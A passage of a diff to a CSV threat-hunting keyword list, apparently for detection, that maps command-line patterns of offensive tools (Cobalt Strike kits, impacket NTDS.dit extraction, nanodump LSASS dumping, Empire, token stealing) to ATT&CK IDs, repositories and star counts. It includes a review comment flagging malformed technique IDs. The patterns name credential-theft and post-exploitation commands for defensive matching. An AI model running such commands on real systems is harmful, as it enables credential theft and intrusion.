Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"* start_hidden_process*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "* steal_token /process:* /command:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - 
TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"* stop covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"* stop covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* striker.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* stun-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* stun-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* stuxnet-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* supermicro-ipmi-conf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"* Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "* -sV --script vulners *","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* svn-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* SW2_HashSyscall*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" 
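Review bot: The two Covenant rows rewritten in this hunk (`* start covenant*` and `* stop covenant*`) still carry technique IDs in hyphen form (`T1573-001`, `T1059-001`, `T1574-001`), while every other row here uses the ATT&CK dot form (`T1548.002`, `T1003.001`). A consumer that splits `metadata_tool_techniques` on ` - ` and joins the values to ATT&CK will not match these rows, so alerts on the Covenant keywords would lose their technique mapping. Since the lines are already being touched for the star and fork counts, normalise them to the dot form, e.g. `T1573.001 - T1573.002 - T1059.001 - T1059.003 - T1059.004`. Some of the listed IDs (`T1573-003` to `T1573-005`, `T1570-001`) do not appear to correspond to existing sub-techniques and should be checked against the current matrix rather than converted mechanically.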
@@ -1932,24 +1932,24 @@ "* --syscalls GetSyscallStub*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* -syscalls -sleep=*.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* --syscalls SysWhispers3*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* -system SYSTEM -ntds NTDS.dit LOCAL*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with 
network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -system SYSTEM -ntds NTDS.dit -outputfile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -system SYSTEM -ntds NTDS.dit LOCAL*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -system SYSTEM -ntds NTDS.dit -outputfile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* --syswhispers --jump*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* SysWhispers*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" -"* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "* -t 127.0.0.1 -p 1337 *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "* -t BindShell -p *pwned\pipe\spoolss*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - 
T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "* -t C2concealer *","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "* -t CreateProcessAsUserW -p *pwned\pipe\spoolss* -e *.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "* -t dcsync://* -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -t donut *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* -t pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* -t 
schtaskbackdoor *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" -"* -Target * -AllDomain *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -Target * -InitialGrooms 
*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -Target * -Shellcode *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -t donut *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -t pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -t schtaskbackdoor *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence 
toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"* -Target * -AllDomain *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Target * -InitialGrooms *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
